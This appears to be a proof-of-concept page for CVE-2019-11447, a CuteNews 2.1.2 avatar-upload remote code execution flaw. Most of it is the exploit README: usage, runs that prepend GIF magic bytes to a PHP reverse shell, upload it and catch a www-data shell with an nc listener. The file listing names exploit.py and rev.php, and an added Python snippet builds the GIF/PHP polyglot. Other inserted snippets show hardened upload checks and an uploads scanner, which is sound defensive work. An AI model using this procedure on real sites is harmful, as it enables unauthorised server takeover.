Associated Vulnerability
Title: Duplicate number (CVE-2019-11447)
Description: An issue was discovered in CutePHP CuteNews 2.1.2. An attacker can infiltrate the server through the avatar upload process in the profile area via the avatar_file field to index.php?mod=main&opt=personal. There is no effective control of $imgsize in /core/modules/dashboard.php. The header content of a file can be changed and the control can be bypassed for code execution. (An attacker can use the GIF header for this.)
Description
Exploit Code for CVE-2019-11447 aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)
Readme
# CVE-2019-11447 Exploit/PoC - CuteNews 2.1.2 Avatar upload RCE (Authenticated)
> Exploit Code for [CVE-2019-11447](https://nvd.nist.gov/vuln/detail/CVE-2019-11447) aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)
Exploit Links:
Expected outcome: log in with or register an account, prepend GIF magic bytes to a user-selected PHP file, upload it as an avatar, then request it to achieve remote code execution.
Intended only for educational use and for testing in corporate environments.
This exploit was tested with Python 3.8.6.
### Usage
```shell
cfx: ~/cutenews
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERNAME] [-p PASSWORD] [-e EMAIL]
CuteNews 2.1.2 Avatar upload RCE (Authenticated) by ColdFusionX
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL CuteNews URL (Example: http://127.0.0.1)
-u USERNAME, --username USERNAME
Username to Login/Register
-p PASSWORD, --password PASSWORD
Password to Login/Register
-e EMAIL, --email EMAIL
Email to Login/Register
Exploit Usage :
./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticon.net
./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[^] Select your PHP file -> rev.php
OR
[^] Select your PHP file -> ~/Downloads/rev.php
[^] Press y/n to trigger reverse shell -> y
```
#### User Inputs :
This exploit takes four command-line arguments:
- **-l** : CuteNews URL
- **-u** : Username used to log in or register
- **-p** : Password used to log in or register
- **-e** : Email used to log in or register
Additional inputs requested at runtime:
- **Select your PHP file ->** The PHP file to upload. It can be **any** PHP file, for example a phpinfo page or a PHP reverse shell. If the file is in the same directory as the exploit, just give the file name:
Example: `[^] Select your PHP file -> rev.php`
Otherwise give the path to the file:
Example: `[^] Select your PHP file -> ~/Downloads/rev.php`
- **Press y/n to trigger reverse shell ->** If the uploaded file is a PHP reverse shell, answer y or n to choose whether the exploit should request the file and trigger the shell.
Either way the exploit prints the location of the uploaded file for further use.
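The "Adding Magic Byte to PHP file" step, and the header-only `$imgsize` check it defeats, as an added Python example (this is not the exploit's own code and not CuteNews code): `make_polyglot` builds a GIF-headed PHP file, `header_only_size` models a check that, like PHP's `getimagesize()`, parses only the header and so reports a valid size for the polyglot, and `hardened_accept` shows what an avatar handler has to verify instead. The 10-byte header layout, the `phpinfo()` payload and all function names are assumptions made for the example.

```python
import struct

# Constructed sample input (not from the page): a minimal PHP payload.
PHP_SOURCE = b"<?php phpinfo(); ?>"

GIF_MAGIC = (b"GIF87a", b"GIF89a")


def make_polyglot(php_source: bytes, width: int = 1, height: int = 1) -> bytes:
    """Prepend a GIF89a signature plus a 4-byte logical screen size (little-endian
    width, height) to arbitrary PHP source. This is what the README's
    "Adding Magic Byte to PHP file" step amounts to; the exact bytes the exploit
    writes are not shown on the page, so this layout is an assumption."""
    return b"GIF89a" + struct.pack("<HH", width, height) + php_source


def header_only_size(data: bytes):
    """Model of a getimagesize()-style check that trusts the first 10 bytes.
    Returns (width, height) for anything that starts like a GIF, else None.
    Assumption: the vulnerable handler accepts any upload for which such a call
    returns a size, regardless of what follows the header."""
    if len(data) < 10 or data[:6] not in GIF_MAGIC:
        return None
    width, height = struct.unpack("<HH", data[6:10])
    return width, height


def contains_php_tag(data: bytes) -> bool:
    """True if the bytes contain a PHP open tag. The bare '<?' short tag is only
    honoured when short_open_tag is enabled, so it is left out here to avoid
    flagging '<?xml' in SVG uploads."""
    lowered = data.lower()
    return b"<?php" in lowered or b"<?=" in lowered


def hardened_accept(filename: str, data: bytes) -> bool:
    """What an avatar handler should require before saving an upload: an
    allow-listed image extension, a signature that matches that extension,
    and no PHP tag anywhere in the body."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    signatures = {
        "gif": GIF_MAGIC,
        "png": (b"\x89PNG\r\n\x1a\n",),
        "jpg": (b"\xff\xd8\xff",),
        "jpeg": (b"\xff\xd8\xff",),
    }
    if ext not in signatures:
        return False
    if not any(data.startswith(sig) for sig in signatures[ext]):
        return False
    if contains_php_tag(data):
        return False
    return True


POLYGLOT = make_polyglot(PHP_SOURCE)
# Constructed benign GIF: header plus padding, no PHP inside.
CLEAN_GIF = b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x00" * 16

if __name__ == "__main__":
    print("header-only check sees:", header_only_size(POLYGLOT))
    print("hardened check, avatar.php:", hardened_accept("avatar.php", POLYGLOT))
    print("hardened check, avatar.gif:", hardened_accept("avatar.gif", POLYGLOT))
    print("hardened check, clean gif :", hardened_accept("avatar.gif", CLEAN_GIF))
```

Note that `hardened_accept` alone is still a blacklist on content; the durable fix is to re-encode the upload with an image library, store it under a server-chosen name with an image extension, and deny script execution in the uploads directory at the web server.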
#### Exploit Execution
- Scenario 1 > Logging in with existing credentials and getting a reverse shell:
```shell
cfx: ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://10.10.10.206/CuteNews/uploads/avatar_cold_cold.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed
```
#### Shell
```shell
cfx: ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:06:04 up 4:15, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
prime tty7 :0 22:50 4:15m 9.36s 0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
```
- Scenario 2 > Registering a new user and getting a reverse shell:
```shell
cfx: ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticons.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] Credentials cold:fusion Successfully Registered
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://127.0.0.1/CuteNews/uploads/avatar_cold_cold.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed
```
#### Shell
```shell
cfx: ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:06:04 up 4:15, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
prime tty7 :0 22:50 4:15m 9.36s 0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
```
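For the responder side, an added Python example (not part of the exploit or of CuteNews) that hunts an uploads directory for the artefact both scenarios above leave behind: a file under `uploads/` with an executable extension such as the `avatar_cold_cold.php` shown in the output, or a file whose body opens with an image signature but also carries a PHP open tag. The directory it scans is constructed in a temporary folder with made-up file names and contents; the extension list and the function names are assumptions.

```python
import os
import re
import tempfile

# Signatures of the image types an avatar upload would plausibly carry.
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
# Extensions PHP-capable servers commonly execute; adjust to the host's handler map.
EXEC_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def classify_upload(path: str) -> list:
    """Return the findings for one file: 'executable-extension' when the name
    would be handed to the PHP engine, 'image-php-polyglot' when the body
    starts with an image signature but also contains a PHP open tag."""
    with open(path, "rb") as fh:
        data = fh.read()
    findings = []
    if os.path.splitext(path)[1].lower() in EXEC_EXTENSIONS:
        findings.append("executable-extension")
    if data.startswith(IMAGE_MAGIC) and PHP_TAG.search(data):
        findings.append("image-php-polyglot")
    return findings


def scan_uploads(root: str) -> dict:
    """Walk an uploads tree and map relative path -> findings, keeping only
    files that produced at least one finding."""
    flagged = {}
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            full = os.path.join(dirpath, name)
            hits = classify_upload(full)
            if hits:
                flagged[os.path.relpath(full, root)] = hits
    return flagged


def build_demo_uploads() -> str:
    """Create a constructed uploads directory (not real data) that mirrors the
    file name the README shows, avatar_cold_cold.php, next to benign files."""
    root = tempfile.mkdtemp(prefix="cutenews_uploads_")
    samples = {
        "avatar_cold_cold.php": b"GIF89a\x01\x00\x01\x00<?php phpinfo(); ?>",
        "avatar_optimus.gif": b"GIF89a\x01\x00\x01\x00" + b"\x00" * 16,
        "avatar_prime.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        "readme.txt": b"avatars live here",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    return root


def demo() -> dict:
    """Build the constructed directory and scan it."""
    return scan_uploads(build_demo_uploads())


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, "->", ", ".join(hits))
```

Run it against a real CuteNews `uploads/` directory by calling `scan_uploads("/var/www/CuteNews/uploads")` (path assumed). A hit on `executable-extension` is the stronger signal, since a polyglot that the web server never executes is only a nuisance; pairing the scan with a web-server rule that denies execution of script extensions under `uploads/` removes the impact even before the upload check is fixed.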
## Reference
- <https://nvd.nist.gov/vuln/detail/CVE-2019-11447>
File Snapshot
[4.0K] /data/pocs/fdc82d593fd79c5c036ee120438607388df29ca5
├── [6.5K] exploit.py
├── [4.7K] README.md
└── [5.4K] rev.php
0 directories, 3 files